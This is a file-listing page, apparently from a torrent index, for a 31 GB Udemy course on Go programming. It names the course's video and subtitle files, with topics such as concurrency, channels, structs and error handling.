Udemy - Learn-how-to-code - Google-Go-golang- Programming- Language (2018)

mp4   Hot:1150   Size:31.14 GB   Created:2019-03-02 13:14:04   Update:2021-12-13 15:21:25  

File List

  • 06 Programming fundamentals/035 How computers work.mp4 331.59 MB
    24 Error handling/175 Errors with info.mp4 327.22 MB
    21 Exercises - Ninja Level 9/148 Hands-on exercise 1.mp4 283.15 MB
    14 Functions/106 Interfaces polymorphism.mp4 271.95 MB
    20 Concurrency/144 Documentation.mp4 267.64 MB
    03 Your development environment/015 Go commands.mp4 264.08 MB
    29 Exercises - Ninja Level 13/196 Hands-on exercise 2.mp4 263.98 MB
    04 Variables values type/020 Introduction to packages.mp4 248.83 MB
    06 Programming fundamentals/038 Numeral systems.mp4 247.51 MB
    12 Structs/096 Housekeeping.mp4 246.43 MB
    18 Application/132 Writer interface.mp4 237.54 MB
    07 Exercises - Ninja Level 2/048 Hands-on exercise 7.mp4 231.71 MB
    06 Programming fundamentals/037 String type.mp4 225.94 MB
    24 Error handling/171 Understanding.mp4 222.09 MB
    33 Installing Go/210 Linux - Machine Setup.mp4 221.96 MB
    06 Programming fundamentals/036 Numeric types.mp4 221.78 MB
    04 Variables values type/023 Exploring type.mp4 219.78 MB
    18 Application/131 JSON unmarshal.mp4 219.34 MB
    22 Channels/155 Understanding channels.mp4 216.64 MB
    04 Variables values type/021 Short declaration operator.mp4 216.48 MB
    20 Concurrency/142 WaitGroup.mp4 212.63 MB
    22 Channels/163 Context.mp4 209.01 MB
    29 Exercises - Ninja Level 13/197 Hands-on exercise 3.mp4 205.37 MB
    01 Introduction/002 Why go.mp4 201.97 MB
    03 Your development environment/009 Shell bash commands I.mp4 198.7 MB
    28 Testing benchmarking/187 Introduction.mp4 198.59 MB
    01 Introduction/003 How to succeed.mp4 196.38 MB
    19 Exercises - Ninja Level 8/139 Hands-on exercise 4.mp4 196.36 MB
    18 Application/129 JSON documentation.mp4 186.95 MB
    29 Exercises - Ninja Level 13/195 Hands-on exercise 1.mp4 180.32 MB
    18 Application/135 bcrypt.mp4 179.76 MB
    14 Functions/103 Unfurling a slice.mp4 179.15 MB
    46 Applied Concurrency/346 Fan Out Fan In - Example.mp4 177.04 MB
    14 Functions/101 Syntax.mp4 176.98 MB
    03 Your development environment/014 IDEs.mp4 176.08 MB
    26 Writing documentation/185 Writing documentation.mp4 173.37 MB
    03 Your development environment/017 Github explored.mp4 172.35 MB
    26 Writing documentation/181 Introduction.mp4 171.73 MB
    10 Grouping data/079 Map - introduction.mp4 169.33 MB
    20 Concurrency/145 Race condition.mp4 166.8 MB
    28 Testing benchmarking/193 Benchmark examples.mp4 166.13 MB
    41 Data Structures - Map/299 Hash Tables.mp4 164.31 MB
    03 Your development environment/013 Environment variables.mp4 163.31 MB
    28 Testing benchmarking/194 Review.mp4 161.82 MB
    21 Exercises - Ninja Level 9/149 Hands-on exercise 2.mp4 161.47 MB
    20 Concurrency/143 Method sets revisited.mp4 160.29 MB
    36 Language Fundamentals/252 Section Review.mp4 159.63 MB
    22 Channels/159 Select.mp4 156.67 MB
    06 Programming fundamentals/041 Bit shifting.mp4 154.62 MB
    08 Control flow/052 Loop - for statement.mp4 154.52 MB
    03 Your development environment/016 Github repos.mp4 153.52 MB
    14 Functions/110 Callback.mp4 153.02 MB
    25 Exercises - Ninja Level 11/177 Hands-on exercise 2.mp4 153 MB
    04 Variables values type/022 The var keyword.mp4 151.61 MB
    03 Your development environment/011 Installing Go.mp4 151.6 MB
    04 Variables values type/019 Hello world.mp4 151.05 MB
    24 Error handling/173 Printing and logging.mp4 149.2 MB
    26 Writing documentation/182 go doc.mp4 148.4 MB
    05 Exercises - Ninja Level 1/033 Hands-on exercise 6.mp4 147.29 MB
    16 Pointers/124 What are pointers.mp4 147.06 MB
    33 Installing Go/212 Linux - Configuring Path Variables.mp4 145.84 MB
    21 Exercises - Ninja Level 9/150 Hands-on exercise 3.mp4 144.26 MB
    14 Functions/109 Returning a func.mp4 143.81 MB
    25 Exercises - Ninja Level 11/178 Hands-on exercise 3.mp4 141.43 MB
    10 Grouping data/077 Slice - make.mp4 140.28 MB
    15 Exercises - Ninja Level 6/113 Hands-on exercise 1.mp4 135.61 MB
    18 Application/134 Sort custom.mp4 133.54 MB
    24 Error handling/174 Recover.mp4 132.83 MB
    47 Concurrency Challenges/350 Fan Out Fan In - Solution Factorial.mp4 130.66 MB
    28 Testing benchmarking/189 Example tests.mp4 130.26 MB
    08 Control flow/059 Conditional - switch statement documentation.mp4 129.52 MB
    03 Your development environment/008 Bash on windows.mp4 129.13 MB
    15 Exercises - Ninja Level 6/117 Hands-on exercise 5.mp4 127.57 MB
    14 Functions/112 Recursion.mp4 126.93 MB
    36 Language Fundamentals/243 Language Spec.mp4 126.61 MB
    19 Exercises - Ninja Level 8/140 Hands-on exercise 5.mp4 124.95 MB
    30 Farewell/198 Farewell.mp4 124.42 MB
    38 Functions/282 Section Review.mp4 124.24 MB
    04 Variables values type/025 The fmt package.mp4 123.31 MB
    14 Functions/102 Variadic parameter.mp4 120.97 MB
    06 Programming fundamentals/034 Bool type.mp4 120.74 MB
    08 Control flow/058 Conditional - switch statement.mp4 120.63 MB
    16 Pointers/125 When to use pointers.mp4 120.19 MB
    22 Channels/156 Directional channels.mp4 119.65 MB
    20 Concurrency/141 Concurrency vs parallelism.mp4 119.33 MB
    28 Testing benchmarking/191 Benchmark.mp4 119 MB
    03 Your development environment/010 Shell bash commands II.mp4 118.96 MB
    28 Testing benchmarking/192 Coverage.mp4 117.84 MB
    03 Your development environment/007 The terminal.mp4 117.7 MB
    02 Course Overview/004 Course resources.mp4 117.37 MB
    14 Functions/111 Closure.mp4 117.28 MB
    04 Variables values type/018 Playground.mp4 116.61 MB
    49 Error Handling/359 Handling Errors Logging Errors to a File.mp4 112.41 MB
    34 Your Development Environment/223 Using Github.mp4 111.07 MB
    12 Structs/094 Reading documentation.mp4 109.83 MB
    23 Exercises - Ninja Level 10/170 Hands-on exercise 7.mp4 109.76 MB
    40 Data Structures - Slice/291 Section Review.mp4 109.7 MB
    43 Interfaces/316 Donovan Kernighan.mp4 109.6 MB
    37 Control Flow/257 Documentation Terminology.mp4 109.31 MB
    11 Exercises - Ninja Level 4/088 Hands-on exercise 7.mp4 108.3 MB
    35 Computer Fundamentals/227 How Computers Work - Part II.mp4 108.23 MB
    33 Installing Go/211 Linux - Machine Configuration.mp4 106.89 MB
    49 Error Handling/357 An Introduction to Error Handling in Go.mp4 106.71 MB
    08 Control flow/054 Loop - printing ascii.mp4 105.16 MB
    43 Interfaces/314 Code Substitutability.mp4 103.27 MB
    47 Concurrency Challenges/348 Fan Out Fan In - Solution.mp4 103.2 MB
    15 Exercises - Ninja Level 6/115 Hands-on exercise 3.mp4 102.64 MB
    43 Interfaces/319 Sort Reverse.mp4 102.4 MB
    04 Variables values type/026 Creating your own type.mp4 102.32 MB
    05 Exercises - Ninja Level 1/028 Hands-on exercise 1.mp4 101.28 MB
    28 Testing benchmarking/188 Table tests.mp4 100.6 MB
    41 Data Structures - Map/303 Finished Hash Algorithm.mp4 100.44 MB
    22 Channels/161 Fan in.mp4 100.35 MB
    41 Data Structures - Map/300 Hashing Words.mp4 98.09 MB
    15 Exercises - Ninja Level 6/121 Hands-on exercise 9.mp4 97.83 MB
    40 Data Structures - Slice/289 Creating A Slice.mp4 97.74 MB
    04 Variables values type/027 Conversion not casting.mp4 97.69 MB
    02 Course Overview/005 Documentation.mp4 97.57 MB
    35 Computer Fundamentals/232 Text Encoding.mp4 97.38 MB
    19 Exercises - Ninja Level 8/137 Hands-on exercise 2.mp4 97.16 MB
    42 Data Structures - Struct/305 OOP in Go.mp4 97.15 MB
    26 Writing documentation/183 godoc.mp4 96.32 MB
    14 Functions/104 Defer.mp4 94.76 MB
    16 Pointers/126 Method sets.mp4 93.88 MB
    49 Error Handling/364 Providing Even More Context with Errors.mp4 93.44 MB
    24 Error handling/172 Checking errors.mp4 93.18 MB
    21 Exercises - Ninja Level 9/154 Hands-on exercise 7.mp4 92.86 MB
    43 Interfaces/321 Empty Interface.mp4 91.67 MB
    49 Error Handling/358 Improving Your Code with Golint.mp4 90.54 MB
    15 Exercises - Ninja Level 6/123 Hands-on exercise 11.mp4 90.41 MB
    37 Control Flow/262 Exercise Solutions.mp4 89.48 MB
    11 Exercises - Ninja Level 4/086 Hands-on exercise 5.mp4 89.21 MB
    33 Installing Go/206 Environment Variables.mp4 89.18 MB
    33 Installing Go/204 Installation Insights.mp4 88.2 MB
    08 Control flow/053 Loop - break continue.mp4 87.72 MB
    35 Computer Fundamentals/234 Format Printing.mp4 87.31 MB
    49 Error Handling/361 Custom Errors - Creating Values of Type error.mp4 87.13 MB
    37 Control Flow/263 Section Review.mp4 86.07 MB
    43 Interfaces/317 Sort Package.mp4 85.66 MB
    42 Data Structures - Struct/308 JSON Marshal.mp4 85.59 MB
    20 Concurrency/147 Atomic.mp4 85.54 MB
    14 Functions/105 Methods.mp4 85.5 MB
    40 Data Structures - Slice/286 Slices.mp4 85.23 MB
    08 Control flow/055 Conditional - if statement.mp4 84.68 MB
    03 Your development environment/012 Go workspace.mp4 84.49 MB
    41 Data Structures - Map/301 Hashing Words II.mp4 84.32 MB
    44 Concurrency/329 Review Channels Preview.mp4 84.2 MB
    22 Channels/162 Fan out.mp4 83.82 MB
    32 Introduction/200 Why choose the Go programming language.mp4 83.66 MB
    05 Exercises - Ninja Level 1/031 Hands-on exercise 4.mp4 83.44 MB
    09 Exercises - Ninja Level 3/070 Hands-on exercise 10.mp4 82.76 MB
    18 Application/130 JSON marshal.mp4 82.63 MB
    26 Writing documentation/184 godoc.org.mp4 82.37 MB
    43 Interfaces/322 Method Sets.mp4 82.22 MB
    41 Data Structures - Map/296 Map Documentation.mp4 82.19 MB
    49 Error Handling/363 Providing Context with Errors.mp4 81.72 MB
    22 Channels/157 Using channels.mp4 81.53 MB
    37 Control Flow/259 String Type.mp4 81.43 MB
    49 Error Handling/360 Four Common Ways to Handle Errors.mp4 80.77 MB
    35 Computer Fundamentals/226 How Computers Work - Part I.mp4 80.19 MB
    35 Computer Fundamentals/228 Github Update Command.mp4 79.54 MB
    10 Grouping data/072 Slice - composite literal.mp4 78.61 MB
    23 Exercises - Ninja Level 10/167 Hands-on exercise 4.mp4 78.57 MB
    12 Structs/093 Embedded structs.mp4 78.26 MB
    35 Computer Fundamentals/235 Section Review.mp4 77.88 MB
    04 Variables values type/024 Zero value.mp4 77.13 MB
    22 Channels/160 Comma ok idiom.mp4 76.45 MB
    11 Exercises - Ninja Level 4/087 Hands-on exercise 6.mp4 76.35 MB
    45 Channels/330 Channels - Introduction.mp4 76.23 MB
    18 Application/133 Sort.mp4 76.01 MB
    25 Exercises - Ninja Level 11/179 Hands-on exercise 4.mp4 75.3 MB
    43 Interfaces/323 Conversion vs Assertion.mp4 75.16 MB
    21 Exercises - Ninja Level 9/153 Hands-on exercise 6.mp4 75.13 MB
    10 Grouping data/075 Slice - append to a slice.mp4 75.02 MB
    22 Channels/158 Range.mp4 74.68 MB
    50 Farewell/367 Next Steps.mp4 74.21 MB
    19 Exercises - Ninja Level 8/138 Hands-on exercise 3.mp4 73.51 MB
    41 Data Structures - Map/302 Build A Hash Table.mp4 72.87 MB
    36 Language Fundamentals/239 Variables.mp4 71.43 MB
    42 Data Structures - Struct/306 User-Defined Types.mp4 71.21 MB
    43 Interfaces/315 Bill Kennedy.mp4 70 MB
    35 Computer Fundamentals/233 Coding Scheme Programs.mp4 69.93 MB
    10 Grouping data/076 Slice - deleting from a slice.mp4 69.15 MB
    17 Exercises - Ninja Level 7/128 Hands-on exercise 2.mp4 68.71 MB
    45 Channels/333 Semaphores - Part 1.mp4 68.39 MB
    10 Grouping data/071 Array.mp4 68.17 MB
    43 Interfaces/313 Interface Examples.mp4 68.07 MB
    36 Language Fundamentals/242 Closure.mp4 68.05 MB
    15 Exercises - Ninja Level 6/116 Hands-on exercise 4.mp4 66.97 MB
    38 Functions/278 Bool Expressions.mp4 66.65 MB
    34 Your Development Environment/222 Understanding Github.mp4 66.35 MB
    37 Control Flow/253 Section Overview.mp4 66.25 MB
    38 Functions/275 Pass By Value.mp4 66.16 MB
    33 Installing Go/208 Mac - Configuring Path Variables.mp4 65.8 MB
    14 Functions/107 Anonymous func.mp4 65.45 MB
    49 Error Handling/365 Error Handling Review Resources.mp4 65.35 MB
    36 Language Fundamentals/246 Constants II.mp4 65.06 MB
    15 Exercises - Ninja Level 6/114 Hands-on exercise 2.mp4 64.71 MB
    28 Testing benchmarking/190 Golint.mp4 64.69 MB
    46 Applied Concurrency/342 Factorial Challenge Redux.mp4 64.68 MB
    33 Installing Go/205 Go Workspace.mp4 63.49 MB
    33 Installing Go/207 Windows - Configuring Path Variables.mp4 63.37 MB
    45 Channels/336 Channels as Arguments Returns.mp4 63.36 MB
    34 Your Development Environment/219 Creating Your First Project.mp4 63.05 MB
    20 Concurrency/146 Mutex.mp4 62.7 MB
    38 Functions/279 Exercises - Part I.mp4 62.17 MB
    41 Data Structures - Map/292 Maps Introduction.mp4 61.92 MB
    37 Control Flow/260 Switch Statements.mp4 61.84 MB
    19 Exercises - Ninja Level 8/136 Hands-on exercise 1.mp4 61.72 MB
    46 Applied Concurrency/339 Deadlock Challenge.mp4 61.27 MB
    39 Data Structures - Array/285 Array Examples.mp4 61.08 MB
    10 Grouping data/080 Map - add element range.mp4 60.93 MB
    21 Exercises - Ninja Level 9/152 Hands-on exercise 5.mp4 60.81 MB
    21 Exercises - Ninja Level 9/151 Hands-on exercise 4.mp4 60.02 MB
    27 Exercises - Ninja Level 12/186 Hands-on exercise 1.mp4 60.02 MB
    08 Control flow/050 Loop - init condition post.mp4 59.69 MB
    41 Data Structures - Map/294 Map Examples - Part II.mp4 59.61 MB
    40 Data Structures - Slice/288 More Slice Examples.mp4 59.55 MB
    36 Language Fundamentals/245 Constants.mp4 59.44 MB
    46 Applied Concurrency/345 Fan In Pattern.mp4 59.26 MB
    36 Language Fundamentals/241 Scope II.mp4 59.01 MB
    38 Functions/281 Exercises - Part III.mp4 58.66 MB
    39 Data Structures - Array/284 Array.mp4 58.62 MB
    42 Data Structures - Struct/307 Composition.mp4 58.6 MB
    47 Concurrency Challenges/354 Incrementor Solution.mp4 57.9 MB
    49 Error Handling/362 Idiomatic Error Handling.mp4 57.73 MB
    37 Control Flow/258 Rune.mp4 57.52 MB
    41 Data Structures - Map/293 Map Examples - Part I.mp4 57.08 MB
    34 Your Development Environment/220 Hello World with Webstorm.mp4 56.96 MB
    36 Language Fundamentals/248 Memory Addresses.mp4 56.71 MB
    32 Introduction/201 Hello World.mp4 56.61 MB
    46 Applied Concurrency/338 Incrementor With Channels.mp4 55.74 MB
    10 Grouping data/078 Slice - multi-dimensional slice.mp4 55.65 MB
    36 Language Fundamentals/237 Packages.mp4 55.62 MB
    08 Control flow/051 Loop - nesting loops.mp4 55.55 MB
    41 Data Structures - Map/298 GitHub Pull.mp4 55.52 MB
    35 Computer Fundamentals/229 Numeral Systems.mp4 55.33 MB
    45 Channels/337 Channel Direction.mp4 54.73 MB
    42 Data Structures - Struct/311 JSON Decode.mp4 54.66 MB
    23 Exercises - Ninja Level 10/164 Hands-on exercise 1.mp4 54.36 MB
    13 Exercises - Ninja Level 5/098 Hands-on exercise 2.mp4 54.32 MB
    14 Functions/108 func expression.mp4 53.46 MB
    40 Data Structures - Slice/287 Slice Examples.mp4 53.25 MB
    01 Introduction/001 Valuable Resources.mp4 52.88 MB
    08 Control flow/057 Loop conditional modulus.mp4 52.77 MB
    05 Exercises - Ninja Level 1/029 Hands-on exercise 2.mp4 52.47 MB
    10 Grouping data/074 Slice - slicing a slice.mp4 52.3 MB
    46 Applied Concurrency/341 Pipeline Pattern.mp4 52.25 MB
    36 Language Fundamentals/240 Scope.mp4 52.18 MB
    05 Exercises - Ninja Level 1/032 Hands-on exercise 5.mp4 51.69 MB
    12 Structs/092 Struct.mp4 51.63 MB
    15 Exercises - Ninja Level 6/119 Hands-on exercise 7.mp4 51.61 MB
    37 Control Flow/254 For Loop.mp4 51.6 MB
    13 Exercises - Ninja Level 5/097 Hands-on exercise 1.mp4 51.2 MB
    38 Functions/271 Callbacks.mp4 51.09 MB
    42 Data Structures - Struct/304 Structs Introduction.mp4 50.95 MB
    07 Exercises - Ninja Level 2/043 Hands-on exercise 2.mp4 50.8 MB
    13 Exercises - Ninja Level 5/100 Hands-on exercise 4.mp4 50.75 MB
    38 Functions/265 Intro To Functions.mp4 50.46 MB
    25 Exercises - Ninja Level 11/176 Hands-on exercise 1.mp4 50.43 MB
    34 Your Development Environment/221 The Go Command Documentation.mp4 50.06 MB
    33 Installing Go/203 The Terminal.mp4 49.78 MB
    47 Concurrency Challenges/352 Deadlock Solution.mp4 49.74 MB
    11 Exercises - Ninja Level 4/084 Hands-on exercise 3.mp4 49.51 MB
    37 Control Flow/261 If Statements.mp4 49.33 MB
    13 Exercises - Ninja Level 5/099 Hands-on exercise 3.mp4 49.03 MB
    08 Control flow/060 Conditional logic operators.mp4 48.68 MB
    36 Language Fundamentals/236 Section Overview.mp4 47.69 MB
    06 Programming fundamentals/039 Constants.mp4 46.81 MB
    42 Data Structures - Struct/310 JSON Encode.mp4 46.74 MB
    45 Channels/332 N-to-1.mp4 46.07 MB
    36 Language Fundamentals/249 Pointers.mp4 45.88 MB
    39 Data Structures - Array/283 Data Structures Overview.mp4 45.55 MB
    11 Exercises - Ninja Level 4/089 Hands-on exercise 8.mp4 45.53 MB
    11 Exercises - Ninja Level 4/085 Hands-on exercise 4.mp4 44.94 MB
    36 Language Fundamentals/250 Using Pointers.mp4 44.65 MB
    36 Language Fundamentals/238 Go Commands.mp4 44.3 MB
    33 Installing Go/214 Section Review.mp4 43.74 MB
    05 Exercises - Ninja Level 1/030 Hands-on exercise 3.mp4 43.04 MB
    23 Exercises - Ninja Level 10/166 Hands-on exercise 3.mp4 42.66 MB
    38 Functions/267 Variadic Functions.mp4 42.31 MB
    38 Functions/280 Exercises - Part II.mp4 42.15 MB
    10 Grouping data/073 Slice - for range.mp4 42.07 MB
    12 Structs/095 Anonymous structs.mp4 42.02 MB
    38 Functions/276 Reference Types.mp4 41.72 MB
    09 Exercises - Ninja Level 3/065 Hands-on exercise 5.mp4 41.5 MB
    33 Installing Go/213 Testing Your Installation.mp4 41.02 MB
    34 Your Development Environment/216 Go Editors.mp4 40.94 MB
    35 Computer Fundamentals/231 Hexadecimal Numbering System.mp4 40.5 MB
    23 Exercises - Ninja Level 10/169 Hands-on exercise 6.mp4 40.43 MB
    37 Control Flow/255 Nested Loops.mp4 40.23 MB
    15 Exercises - Ninja Level 6/122 Hands-on exercise 10.mp4 39.92 MB
    08 Control flow/056 Conditional - if else if else.mp4 39.76 MB
    36 Language Fundamentals/251 Remainder.mp4 39.35 MB
    35 Computer Fundamentals/230 Binary Numbering System.mp4 38.81 MB
    38 Functions/273 Recursion.mp4 38.56 MB
    46 Applied Concurrency/340 Factorial Challenge.mp4 38.53 MB
    41 Data Structures - Map/295 Map Examples - Part III.mp4 38.33 MB
    45 Channels/331 Range Clause.mp4 37.85 MB
    46 Applied Concurrency/344 Fan Out Fan In Pattern - Overview.mp4 37.77 MB
    37 Control Flow/256 Conditions Break Continue.mp4 37.71 MB
    48 Concurrency Resources/355 Additional Resources.mp4 36.87 MB
    38 Functions/270 Closure.mp4 36.85 MB
    10 Grouping data/081 Map - delete.mp4 36.78 MB
    46 Applied Concurrency/343 Factorial Challenge Redux Solution.mp4 35.68 MB
    06 Programming fundamentals/040 Iota.mp4 35.43 MB
    43 Interfaces/312 Interfaces Introduction.mp4 35.43 MB
    45 Channels/335 1-to-N.mp4 35.12 MB
    36 Language Fundamentals/244 Blank Identifier.mp4 34.94 MB
    09 Exercises - Ninja Level 3/062 Hands-on exercise 2.mp4 34.86 MB
    07 Exercises - Ninja Level 2/045 Hands-on exercise 4.mp4 34.73 MB
    38 Functions/266 Func Returns.mp4 34.6 MB
    38 Functions/268 Variadic Arguments.mp4 34.24 MB
    38 Functions/269 Func Expressions.mp4 33.54 MB
    34 Your Development Environment/224 Section Review.mp4 33.52 MB
    23 Exercises - Ninja Level 10/168 Hands-on exercise 5.mp4 33.48 MB
    23 Exercises - Ninja Level 10/165 Hands-on exercise 2.mp4 32.65 MB
    11 Exercises - Ninja Level 4/082 Hands-on exercise 1.mp4 32.59 MB
    09 Exercises - Ninja Level 3/061 Hands-on exercise 1.mp4 32.15 MB
    44 Concurrency/328 Atomicity.mp4 31.53 MB
    43 Interfaces/320 Sort Slice Int.mp4 31.26 MB
    38 Functions/274 Defer.mp4 31.16 MB
    34 Your Development Environment/217 WebStorm Atom.io.mp4 30.74 MB
    41 Data Structures - Map/297 Map Range Loop.mp4 30.32 MB
    15 Exercises - Ninja Level 6/120 Hands-on exercise 8.mp4 30.02 MB
    08 Control flow/049 Understanding control flow.mp4 29.06 MB
    31 BONUS MATERIAL/199 An Entire Second Course - Provided for Free.mp4 27.97 MB
    44 Concurrency/326 Race Conditions.mp4 27.82 MB
    02 Course Overview/006 Accelerate learning.mp4 27.82 MB
    40 Data Structures - Slice/290 Incrementing A Slice Item.mp4 27.69 MB
    38 Functions/272 Callback Example.mp4 27.3 MB
    15 Exercises - Ninja Level 6/118 Hands-on exercise 6.mp4 26.09 MB
    36 Language Fundamentals/247 Words of Encouragement.mp4 25.99 MB
    44 Concurrency/327 Mutex.mp4 25.87 MB
    07 Exercises - Ninja Level 2/042 Hands-on exercise 1.mp4 25.51 MB
    11 Exercises - Ninja Level 4/091 Hands-on exercise 10.mp4 25.17 MB
    43 Interfaces/318 Sort Solution.mp4 25.11 MB
    09 Exercises - Ninja Level 3/069 Hands-on exercise 9.mp4 24.47 MB
    44 Concurrency/325 Parallelism.mp4 24.24 MB
    33 Installing Go/202 Section Overview.mp4 23.23 MB
    47 Concurrency Challenges/349 Fan Out Fan In - Challenge Factorial.mp4 22.92 MB
    09 Exercises - Ninja Level 3/063 Hands-on exercise 3.mp4 22.74 MB
    25 Exercises - Ninja Level 11/180 Hands-on exercise 5.mp4 21.79 MB
    09 Exercises - Ninja Level 3/067 Hands-on exercise 7.mp4 21.65 MB
    38 Functions/264 Section Overview.mp4 20.97 MB
    09 Exercises - Ninja Level 3/068 Hands-on exercise 8.mp4 20.39 MB
    34 Your Development Environment/215 Section Overview.mp4 19.31 MB
    11 Exercises - Ninja Level 4/083 Hands-on exercise 2.mp4 19.21 MB
    42 Data Structures - Struct/309 JSON Unmarshal.mp4 19.12 MB
    07 Exercises - Ninja Level 2/044 Hands-on exercise 3.mp4 17.86 MB
    47 Concurrency Challenges/347 Fan Out Fan In - Challenge.mp4 17.79 MB
    11 Exercises - Ninja Level 4/090 Hands-on exercise 9.mp4 16.8 MB
    07 Exercises - Ninja Level 2/047 Hands-on exercise 6.mp4 15.01 MB
    09 Exercises - Ninja Level 3/064 Hands-on exercise 4.mp4 14.91 MB
    38 Functions/277 Anonymous Self-Executing Functions.mp4 14.78 MB
    44 Concurrency/324 Concurrency WaitGroup.mp4 14.58 MB
    09 Exercises - Ninja Level 3/066 Hands-on exercise 6.mp4 13.86 MB
    17 Exercises - Ninja Level 7/127 Hands-on exercise 1.mp4 13.74 MB
    35 Computer Fundamentals/225 Section Overview.mp4 13.37 MB
    45 Channels/334 Semaphores - Part 2.mp4 13.05 MB
    47 Concurrency Challenges/353 Incrementor Challenge Revisited.mp4 12.68 MB
    07 Exercises - Ninja Level 2/046 Hands-on exercise 5.mp4 11.33 MB
    47 Concurrency Challenges/351 Deadlock Challenge.mp4 9.09 MB
    33 Installing Go/210 Linux - Machine Setup-es.srt 49.05 KB
    33 Installing Go/210 Linux - Machine Setup-pt.srt 48.24 KB
    33 Installing Go/210 Linux - Machine Setup-en.srt 47.14 KB
    33 Installing Go/212 Linux - Configuring Path Variables-es.srt 32.33 KB
    06 Programming fundamentals/035 How computers work-es.srt 31.82 KB
    33 Installing Go/212 Linux - Configuring Path Variables-pt.srt 31.53 KB
    06 Programming fundamentals/035 How computers work-pt.srt 30.95 KB
    06 Programming fundamentals/035 How computers work-en.srt 30.74 KB
    33 Installing Go/212 Linux - Configuring Path Variables-en.srt 30.64 KB
    20 Concurrency/144 Documentation-es.srt 28.61 KB
    20 Concurrency/144 Documentation-pt.srt 27.87 KB
    20 Concurrency/144 Documentation-en.srt 27.66 KB
    12 Structs/096 Housekeeping-pt.srt 27.32 KB
    12 Structs/096 Housekeeping-es.srt 27.29 KB
    12 Structs/096 Housekeeping-en.srt 27.03 KB
    24 Error handling/175 Errors with info-es.srt 26.64 KB
    24 Error handling/175 Errors with info-pt.srt 26.33 KB
    36 Language Fundamentals/252 Section Review-es.srt 26.32 KB
    24 Error handling/175 Errors with info-en.srt 26.02 KB
    36 Language Fundamentals/252 Section Review-en.srt 25.94 KB
    46 Applied Concurrency/346 Fan Out Fan In - Example-en.srt 25.92 KB
    36 Language Fundamentals/252 Section Review-pt.srt 25.79 KB
    46 Applied Concurrency/346 Fan Out Fan In - Example-es.srt 25.63 KB
    46 Applied Concurrency/346 Fan Out Fan In - Example-pt.srt 25.46 KB
    14 Functions/106 Interfaces polymorphism-es.srt 25.08 KB
    14 Functions/106 Interfaces polymorphism-pt.srt 24.96 KB
    14 Functions/106 Interfaces polymorphism-en.srt 24.93 KB
    43 Interfaces/319 Sort Reverse-en.srt 24.07 KB
    43 Interfaces/319 Sort Reverse-pt.srt 24.03 KB
    43 Interfaces/319 Sort Reverse-es.srt 23.87 KB
    04 Variables values type/020 Introduction to packages-es.srt 23.49 KB
    29 Exercises - Ninja Level 13/196 Hands-on exercise 2-es.srt 23.27 KB
    04 Variables values type/020 Introduction to packages-pt.srt 23.22 KB
    06 Programming fundamentals/038 Numeral systems-es.srt 23.03 KB
    04 Variables values type/020 Introduction to packages-en.srt 23.01 KB
    34 Your Development Environment/223 Using Github-en.srt 22.94 KB
    06 Programming fundamentals/038 Numeral systems-en.srt 22.92 KB
    18 Application/131 JSON unmarshal-es.srt 22.87 KB
    29 Exercises - Ninja Level 13/196 Hands-on exercise 2-pt.srt 22.77 KB
    06 Programming fundamentals/038 Numeral systems-pt.srt 22.72 KB
    29 Exercises - Ninja Level 13/196 Hands-on exercise 2-en.srt 22.51 KB
    18 Application/131 JSON unmarshal-en.srt 22.48 KB
    22 Channels/163 Context-es.srt 22.48 KB
    18 Application/131 JSON unmarshal-pt.srt 22.42 KB
    41 Data Structures - Map/299 Hash Tables-es.srt 22.15 KB
    41 Data Structures - Map/299 Hash Tables-pt.srt 22.15 KB
    41 Data Structures - Map/299 Hash Tables-en.srt 22 KB
    22 Channels/163 Context-pt.srt 21.98 KB
    22 Channels/155 Understanding channels-es.srt 21.87 KB
    06 Programming fundamentals/037 String type-es.srt 21.84 KB
    22 Channels/155 Understanding channels-en.srt 21.69 KB
    18 Application/132 Writer interface-es.srt 21.68 KB
    03 Your development environment/015 Go commands-es.srt 21.68 KB
    18 Application/132 Writer interface-pt.srt 21.66 KB
    22 Channels/163 Context-en.srt 21.58 KB
    06 Programming fundamentals/037 String type-en.srt 21.54 KB
    06 Programming fundamentals/037 String type-pt.srt 21.54 KB
    21 Exercises - Ninja Level 9/148 Hands-on exercise 1-es.srt 21.52 KB
    21 Exercises - Ninja Level 9/148 Hands-on exercise 1-pt.srt 21.43 KB
    24 Error handling/171 Understanding-es.srt 21.39 KB
    22 Channels/155 Understanding channels-pt.srt 21.37 KB
    21 Exercises - Ninja Level 9/148 Hands-on exercise 1-en.srt 21.26 KB
    03 Your development environment/015 Go commands-pt.srt 21.16 KB
    24 Error handling/171 Understanding-en.srt 21.12 KB
    03 Your development environment/015 Go commands-en.srt 21.05 KB
    18 Application/132 Writer interface-en.srt 21 KB
    24 Error handling/171 Understanding-pt.srt 20.83 KB
    40 Data Structures - Slice/291 Section Review-es.srt 20.69 KB
    06 Programming fundamentals/036 Numeric types-es.srt 20.43 KB
    40 Data Structures - Slice/291 Section Review-pt.srt 20.37 KB
    06 Programming fundamentals/036 Numeric types-pt.srt 20.25 KB
    40 Data Structures - Slice/291 Section Review-en.srt 20.23 KB
    06 Programming fundamentals/036 Numeric types-en.srt 20.19 KB
    35 Computer Fundamentals/227 How Computers Work - Part II-es.srt 20 KB
    37 Control Flow/257 Documentation Terminology-es.srt 19.83 KB
    35 Computer Fundamentals/227 How Computers Work - Part II-pt.srt 19.66 KB
    43 Interfaces/314 Code Substitutability-es.srt 19.6 KB
    35 Computer Fundamentals/227 How Computers Work - Part II-en.srt 19.54 KB
    37 Control Flow/257 Documentation Terminology-en.srt 19.46 KB
    43 Interfaces/314 Code Substitutability-pt.srt 19.32 KB
    37 Control Flow/257 Documentation Terminology-pt.srt 19.31 KB
    20 Concurrency/142 WaitGroup-es.srt 19.25 KB
    40 Data Structures - Slice/289 Creating A Slice-es.srt 19.07 KB
    43 Interfaces/314 Code Substitutability-en.srt 19.01 KB
    20 Concurrency/142 WaitGroup-en.srt 18.96 KB
    40 Data Structures - Slice/289 Creating A Slice-en.srt 18.93 KB
    40 Data Structures - Slice/289 Creating A Slice-pt.srt 18.91 KB
    41 Data Structures - Map/300 Hashing Words-es.srt 18.87 KB
    20 Concurrency/142 WaitGroup-pt.srt 18.87 KB
    32 Introduction/200 Why choose the Go programming language-es.srt 18.78 KB
    29 Exercises - Ninja Level 13/197 Hands-on exercise 3-es.srt 18.72 KB
    41 Data Structures - Map/301 Hashing Words II-es.srt 18.71 KB
    32 Introduction/200 Why choose the Go programming language-pt.srt 18.67 KB
    33 Installing Go/211 Linux - Machine Configuration-es.srt 18.66 KB
    32 Introduction/200 Why choose the Go programming language-en.srt 18.64 KB
    01 Introduction/002 Why go-es.srt 18.64 KB
